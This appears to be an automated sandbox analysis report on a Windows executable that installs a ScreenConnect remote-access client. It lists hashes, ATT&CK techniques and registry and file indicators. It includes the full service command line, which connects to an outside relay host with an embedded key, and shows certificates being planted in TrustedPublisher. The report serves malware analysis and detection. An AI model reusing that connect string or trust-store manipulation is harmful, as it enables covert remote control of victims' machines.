db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32f

Analysis

max time kernel
95s
max time network
113s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
12/10/2024, 18:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe
Size

81KB
MD5

fccabf8ce95cb8c6b35ad26fd72fa320
SHA1

8d701f154d93471be018eea58a8fef33c94faf2d
SHA256

db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32f
SHA512

e6a85ef4bdb9004a959a8c79bf06bf6f14edf2af6823584a95728c11d863027b766160af2ee781c00548d5f25d8f268d96d364fd65d32c941c697e7a084e4a50
SSDEEP

1536:RoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaJPBJYYT7/Kx:LenkyfPAwiMq0RqRfbaJZJYYTz

Score

8^/10

discovery persistence

Malware Config

Signatures

Manipulates Digital Signatures 1 TTPs 3 IoCs

Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C\Blob = 0300000001000000140000007b0f360b775f76c94a12ca48445aa2d2a875701c2000000001000000b4060000308206b030820498a003020102021008ad40b260d29c4c9f5ecda9bd93aed9300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3231303432393030303030305a170d3336303432383233353935395a3069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e6720525341343039362053484133383420323032312043413130820222300d06092a864886f70d01010105000382020f003082020a0282020100d5b42f42d028ad78b75dd539591bb18842f5338ceb3d819770c5bbc48526309fa48e68d85cf5eb342407e14b4fd37843f417d71edaf9d2d5671a524f0ea157fc8899c191cc81033e4d702464b38de2087d347d4c8057126b439a99f2c53b1ff2efcb475a13a64cb3012025f310d38bb2fb08f08ae09d09c065a7fa98804935873d5119e8902178452ea19f2ce118c21accc5ee93497042328ffbc6ea1cf3656891a24d4c8211485268de10bd14575de8181365c57fb24f852c48a4568435d6f92e9caa0015d137fe1a0694c27cc8ea1b32e6cac2f4a7a3030e74a5af39b6ab6012e3e8d6b9f731e1dcade418a0d8c1234747b3a10f6ea3ab6d9806831bb76a672dd2bd441a9210818fb03b09d7c79b325ac2ff6a60548b49c193ede1b45ce06feb26f98cd5b2f93810e6eace91f5bed3fb6f9361345cbc93452883362a66285fb073ce8b262506b283d45cf615194ced62e05e33f2e8e8ec0aa7b0032b91b23679bef7ad081e75a665ccbbe34850f377911afedb50a246c8615898f57c02163c8328ad3986ecd4b70d53d0f847e675308dec30937614a65b4b5d74614d3f129176debf58cb72102941f0d5c56d267668114113589adc262b01f4894d59db78cf814a3e40475fc98150738510232159608a6454c1cc211ae838197c661ccd78384530994fff634f4cbbaa0d0853417c583d47b3fab6ec8c320902cc6c3c0c56110203010001a38201593082015530120603551d130101ff040830060101ff020100301d0603551d0e041604146837e0ebb63bf85f1186fbfe617b088865f44e42301f0603551d23041830168014ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300e0603551d0f0101ff04040302018630130603551d25040c300a06082b06010505070303307706082b06010505070101046b3069302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304106082b060105050730028635687474703a2f2f636163657274732e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63727430430603551d1f043c303a3038a036a0348632687474703a2f2f63726c332e64696769636572742e636f6d2f446967694365727454727573746564526f6f7447342e63726c301c0603551d20041530133007060567810c01033008060667810c010401300d06092a864886f70d01010c050003820201003a23443d8d0876ee8fbc3a99d356e0021aa5f84834f32cb6e67466f79472b100caaf6c302713129e90449f4bfd9ea37c26d537bc3a5d486d95d53f49f427bb16814550fd9cbdb685e0767e3771cb22f75aaa90cff5936ae3eb20d1d55079889a8a8ac1b6bda148187edcd8801a111918cd61998156f6c9e376e7c4e41b5f43f83e94ff76393d9ed499cf4add28eb5f26a1955848d51afed7273ffd90d17686dd1cb0605cf30da8eee089a1bd39e1384eda6ebb369dfbe521535ac3cae96af1a23edb43b833c84f38149299f5ddce546dd95d02141f40337c03e295b2c221757352cb46d8c4341ca2a54b8dcd6f76372c853f1ace26e918be9007b0437f9588208270f0cccaeffd29355c1f893855f7378a8b09a1cb0be9311aff2e195c3971e1be9ca70a06d62667b792e64e5fde7aac49cf2ea47492addb3ca49c861fe3c1561b2b23ff8fb5ea887b706be6a0bafd3a3f45a6c4e81691528b41c048844b964dab4440e38df01528ceedf11856072a2f10c40c08643c338fae288c3ccb8f880b0dbf3bf4ce1e7b8eefb5ebcbb7f07713e6e7283fac12aea52f226c41f9825c1566cc6c0ecac586c3f626330c074ba0d307026a6a4030484b34a85120bbad1b8508e2590d6dca05502bea4a1c9ea5fda0a71f0674e7f2d65290fdaf854821f9573bb49c03ed8645f4b4616ebf68e2266086eac8afa9fe941de7631b3a8656784e	db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\4C2272FBA7A7380F55E2A424E9E624AEE1C14579\Blob = 0300000001000000140000004c2272fba7a7380f55e2a424e9e624aee1c145792000000001000000640700003082076030820548a00302010202100b9360051bccf66642998998d5ba97ce300d06092a864886f70d01010b05003069310b300906035504061302555331173015060355040a130e44696769436572742c20496e632e3141303f060355040313384469676943657274205472757374656420473420436f6465205369676e696e67205253413430393620534841333834203230323120434131301e170d3232303831373030303030305a170d3235303831353233353935395a3065310b30090603550406130255533110300e06035504081307466c6f72696461310e300c0603550407130554616d706131193017060355040a1310436f6e6e656374776973652c204c4c433119301706035504031310436f6e6e656374776973652c204c4c4330820222300d06092a864886f70d01010105000382020f003082020a0282020100ec489826d08d2c6de21b3cd3676db1e0e50cb1ff75ff564e9741f9574aa3640aa8297294a05b4db68abd0760b6b05b50ce92ff42a4e390be776a43e9961c722f6b3a4d5c880bcc6a61b4026f9137d36b2b7e9b86055876b9fa860dbcb164fe7f4b5b9de4799ae4e02dc1f0bee01e5d032933a2827388f8db0b482e76c441b1bd50909ef2023e1fb62196c994ce052266b28cd89253e6416044133139764db5fc45702529536bf82c775f9ec81fa27dc409530325f40cdef95b81b9ce0d42791cee72e7bd1b36c257b52257c65a28970e457513989434bfc239e2992b193e1b3cc3f11ccdd1d26d4ec9845099ab913906a42069af999c0071169b45a2ea1aa666f1904e8acb05e1823a359a291fd46b4ef7aed5935bb6ab17ebf077210726930c90f01761d6544a94e8fa614cc41d817eec734b1c3d3afb7c58fb256f0c09edc1459bddbff9940ed1958570265d67af79a9b6a16affd70fc6328c9810d5dc186e39af6fbcad49a270f237e6bcd5de0bc014bc3179cd79776591340311a42ca94f33416c2e01b59bd1d71de86ace6716bc90b2d7695d155039aa08fbac19a4d93fb784230a20a485287a16355645fc09142c602d140fa046b7bfd75328184ff7bdf8f9e0d65e6201c8d242931047f59bd328ac353777ccefa60408887b84fc3631301463461a1d73c0b5cc74d6d82905ddf923bdbab027a311cc38d3fa16f639a50203010001a382020630820202301f0603551d230418301680146837e0ebb63bf85f1186fbfe617b088865f44e42301d0603551d0e04160414338ce10a6e06d9c6ed0bc6cae736cefb8188646a300e0603551d0f0101ff04040302078030130603551d25040c300a06082b060105050703033081b50603551d1f0481ad3081aa3053a051a04f864d687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c3053a051a04f864d687474703a2f2f63726c342e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e63726c303e0603551d20043730353033060667810c0104013029302706082b06010505070201161b687474703a2f2f7777772e64696769636572742e636f6d2f43505330819406082b06010505070101048187308184302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d305c06082b060105050730028650687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274547275737465644734436f64655369676e696e6752534134303936534841333834323032314341312e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820201000ad79f00cf4984864c8981ecce8718aa875647f6a74608c968e16568c7aa9d711ed7341676038067f01330c91621b27a2a8894c4108c268162a31f13f9757a7d6bb3c6f19bf27c3a29896d712d85873627d827cd6471761444fabf1d31e903f791143c5b4ce5e7444aacba36d759aeba3069d195226755cbc675aa747f77596c53c96e083c45bba24479d6845eea9f2b28ba29b4dcf0bcf14aa4ce176c24e2c1b8fec3ee16e1c086db6fda97388859e83be65c03f701395b78b842c6dd1533ef642cca6fe50f6337d3f2dfedd8b28f2b28e0c98edd2151392e7cc75489f48859f1de14c81b306eb50eed7bb78be30eaada76767c4ca523a11eec5a2372d6122926ab1801a6a6778e9504791487ee47d4577154988802070f80fc535957658f954cd083546c5afb5a6567b6761275f5db20f70ab86feef94c7cfc65369d325121b69a82399bc7dc1962416f0f05cf1eee64d495a3527e464e2c68da0187093f97b673e43dddbcc067e00713f1565fcff8c3772d44b40a04e600644f22a990345f9a6b5b52963e82c81a0ce91d43a230f67b37d8debda40ea3d59d305e18adc1976516c12a8ba2bca24143b12e9527b4dca58872aa9b3a8c6ac563fc2dc02bf51be889516d35a4ba9d062417b5bdcc50ba945fae26b60d6aec03984798a6a21d3ff793cc0849e81ed55b8027411c50db776ae8feef2fdc2dafb04345261dedc054	db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe
Key deleted	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C	db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (25022cd9-073e-40dc-bf74-0eb4d2f3b264)\ImagePath = "\"C:\\Users\\Admin\\AppData\\Local\\Apps\\2.0\\8GLB37EA.3LL\\REQH57D4.HGX\\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\\ScreenConnect.ClientService.exe\" \"?e=Support&y=Guest&h=instance-ud5i67-relay.screenconnect.com&p=443&s=25022cd9-073e-40dc-bf74-0eb4d2f3b264&k=BgIAAACkAABSU0ExAAgAAAEAAQC9apT4qbTuF9C17zc6a3ECss826HabWIb7y364WqYlMvF2tFQnmSqWg0s5unBec%2b3z48FHY7e0p3TbrtuNC6J%2bwq8QtKtX%2fq3sM71BFB4v%2b8sEl3RRFIHNyKr5wssil0KrjpM6XygMhvUYk9abiL%2bb6v1xaqnrYUcSxm8IPp88peWwQHQx2i1SQUdJkddFznx%2bPmYbblzMPg1YoqcBl9ZLhZ7bo2CxUjZ3CBpItCN%2bps1PzKe6nV6i984DEzEFLWYZqzIZckzeIPRZk2FreX5JT%2fKYecbRFNKPejTDyeQhkMHOoHB4Sru4f5OaLaNh0XVIgtOkoo9r74dvO1ZTwJLg&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAbIpSpj7TWkCJ0IL7CCDWtAAAAAACAAAAAAAQZgAAAAEAACAAAACN57ZKbW45QbLKJOHSIUloWqJO%2bdNkeRqCDnBuWOxExgAAAAAOgAAAAAIAACAAAACLhKHLITEwtDiclW3HDsyw0Mj%2bWggcFrc1ZAKnTIQLQ6AEAAAmslv4jraVF0NI3qLjPLXG5rlyGwARErjgxdv29%2feHYzkFWVP4BMUqk8CzSGuWRP0ClM4xs9wTZyscn%2fUmlNuzstQrZY%2bwq9pfVHCDZHV6pZUq3ZP2TWTiSMxk1BJMHbkn198Onx0%2ft1fK%2feHeQ6XVnSsQV3Z5y2dK2Nu0vRd5Sg%2fnnBGPZoGUmCcUdwRlpQBSTJVzOq5QDwTy8BsH1pgvcPPugw3e83%2bv%2b1zNyZatQojWykG%2fQCg3I9y0COm6JSOD4ULx%2fgDWRNN9kZqzvRfJW5OJhqqu32yxX9gFHS9WvEc1yY2Giigr9Y%2bu13zlUBFWuKcm%2bPUBXL4h4TFLjzC%2bI6BE1DD7kFBIuHqAOij38N330fZgPbYA5AlY1LCfkCjFKl6jcqrHDmPaZ%2fRYAKFHsZrtS%2fCmK4GmaBWL7QYCMpEYl%2fAT1Ejkm%2b0uaXIS1rzMfLel2%2fuOiihg3yvqmQBv%2fMqA%2fQpFLzCwHMWphvDSeIyfVz5RYGqKIk0DG1ooxfN7gvxdwmf7ZznkBFlkpWNXwwD8I70HTpsie1EjpvthN47f5tAi0sx2eAH3vscjtlKMFpZjEstpWHxMJlCTcJx7RlGio5WvAjeGE7cgxe8N7VD6JrE31lT3HmyrkqDHTaD1FWIZBXrWduifZhfrW7hPdAsBMkexUhbMXqdNFmp11ZWenDq1jf6%2ffuNdIrzeDDLYDWwMhS9MSD%2btGdg%2f9jnzgIRod5PUfGc7KkEGroWX2gUTxFQBt7ChFVG5SGc4Ycox0KdPq8O7CdsUXzC6u49Up%2fQyMvdInfS1CAVAv2YeusDXEVfLgFbWyACxBJ87e%2bn6lgUCZPOJcfoUqtBBk344EhXU6NKPqPFc%2btUih8GHICZsr52gl552izgnx%2b%2bw0W9VwclYwI%2bY77dGv5LGK6HhGsXJ6NZgNr3yuEP1x2sO6g1I9M1AsHRP8edVOt15srDxGhcvz3FD%2fqf5yZ%2bAJ8fVPhkPT7D8WGohuvq19h5vaEt5zv6%2f7UBDdSCjJILnZ3P6yfJ0sKbpM4zlTM5jnoxdzTGrRfUFvmEjpgNnFGLWihGwyQ543TgnKwkYC9MOHuf93%2b6T142cmYIFriAtGDhU3gmQMNVcbA1jbVehYHxb32uvPQL%2bYYLgtHWeFFy3amd2VAT8XJ%2bf%2f82ohmOKRGGcFsJw09zY3iUf%2bJQJKEkvihinrRmMYEpXj%2b12DuDy2wAH9RZOrxDkipvW53pOWOORJDXlUNBCwtBjUnGb9ZQcneB8qO6JjiFL2oi15bA%2f6EQ7bEUhWbGQsgAnrRDEzAL91Sw2efs99s6RvOive1%2faNz%2fWeFZ5abTUVswZTgSPLBdOBrxmZc3jko8Emtpm5QU2B%2fU%2fjRcsnDU7nJzSXIv3CGnM08henr1qRlcPOoItMDK9TzFtEQgjHjJ%2bBmnzVI8tpqZ7HZI6ZVP7nIR2ZKcoLnlW1h31ZqYpP2RPcbH2VWAJzQf3mgAtebVDwxASbaOE6l1sibw43CnhbUWHIxVDgaY9HqVmbT%2fAA%2bJ8KEIDOxoUtFHlmOv%2boBFp20LnImWlP0db8SSyPGV7RJ8R6XgNu0AAAADPpWwpy8oRh59YCQREK8UmI12bm%2fBj3n4gBwcsSSpeBXyqs1Zs2UswdstfwOHZ4XbgiFrzx08vfr%2fy88%2bZkook&r=&i=fumero\" \"1\""	ScreenConnect.ClientService.exe

Downloads MZ/PE file

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File opened for modification	C:\Windows\system32\user.config	ScreenConnect.WindowsClient.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log	ScreenConnect.ClientService.exe

Executes dropped EXE 4 IoCs

pid	Process
3332	ScreenConnect.WindowsClient.exe
4440	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe
3232	ScreenConnect.WindowsClient.exe

Loads dropped DLL 16 IoCs

pid	Process
4440	ScreenConnect.ClientService.exe
4440	ScreenConnect.ClientService.exe
4440	ScreenConnect.ClientService.exe
4440	ScreenConnect.ClientService.exe
4440	ScreenConnect.ClientService.exe
4440	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe
1648	ScreenConnect.ClientService.exe

Program crash 1 IoCs

pid	pid_target	Process	procid_target
452	1096	WerFault.exe	84

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	db20b0c8f4b8faa38b7239b86764f499a966644584ffcce7ded537d298dfb32fN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe

Modifies data under HKEY_USERS 5 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0003_none_5818e4ff39ec832e\lock!160000008995570e040d0000b00700000000000000000000 = 30303030306430342c30316462316364343532353765323837	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_9837ab9241d36e8a\Files\ScreenConnect.WindowsBackstageShell.exe.co = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..vice_4b14c015c87c1ad8_0018.0003_none_04f4a566935dd369\DigestValue = 802793c2359c310253b0ba3b92625a26959da81d	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Assemblies	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\lock!1d000000a895570e040d0000b007000000000000000000008d506 = 30303030306430342c30316462316364343532353765323837	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_82edd76a6b9d8dd0	ScreenConnect.WindowsClient.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\NonCanonicalData	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{3f471841-eef2-47d6-89c0-d028f03a4ad5}\scre..tion_25b0fbb6ef7eb0 = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742e6170706c69636174696f6e2c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d323562306662623665663765623039342c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_5818e4ff39ec832e\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\scre...exe_25b0fbb6ef7eb094_0018.0003_none_9837ab9241 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_53a10d1dfd9e6ffe\DigestValue = 0ce72c05139489ac222568e372d046f031b5e751	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_5818e4ff39ec832e\Transform = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0003_none_9837ab9241d36e8a	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_none_392be528a852386d\SizeOfStronglyNamedComponent = a98e020000000000	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre...exe_25b0fbb6ef7eb094_0018.0003_none_9837ab9241d36e8a\Files\ScreenConnect.ClientService.exe_e781b1ee36 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b4e7e641e682530b\identity = 53637265656e436f6e6e6563742e57696e646f7773436c69656e742c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_b4e7e641e682530b\Files\ScreenConnect.WindowsClient.exe_6492277df2 = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0003_22dec766967f8525\pin!S_{3f471841-eef2-47d6-89c0-d028f03a4ad5}	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..core_4b14c015c87c1ad8_0018.0003_none_53a10d1dfd9e6ffe\Files	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_5818e4ff39ec832e\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..dows_4b14c015c87c1ad8_0018.0003_none_5818e4ff39ec832e\DigestMethod = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e9b66af00cedc602\identity = 53637265656e436f6e6e6563742e436c69656e742c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0003_none_e9b66af00cedc602\lock!060000007995570e040d0000b00700000000000000000000 = 30303030306430342c30316462316364343532353765323837	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Visibility	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\PackageMetadata\{2ec93463-b0c3-45e1-8364-327e96aea856}_{60051b8f-4f12-400a-8e50-dd05ebd438d1}\NonCanonicalData	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0003_none_5818e4ff39ec832e	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e9b66af00cedc602\Transform = 01	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0003_none_5818e4ff39ec832e\identity = 53637265656e436f6e6e6563742e57696e646f77732c2056657273696f6e3d32342e332e342e393032362c2043756c747572653d6e65757472616c2c205075626c69634b6579546f6b656e3d344231344330313543383743314144382c2070726f636573736f724172636869746563747572653d6d73696c	dfsvc.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..ient_4b14c015c87c1ad8_0018.0003_none_e9b66af00cedc602\DigestMethod = 01	dfsvc.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0003_210f2122fbcba835\scre..ient_4b14c015c87c1ad8_0018.0003_none_e9b66af00c	dfsvc.exe
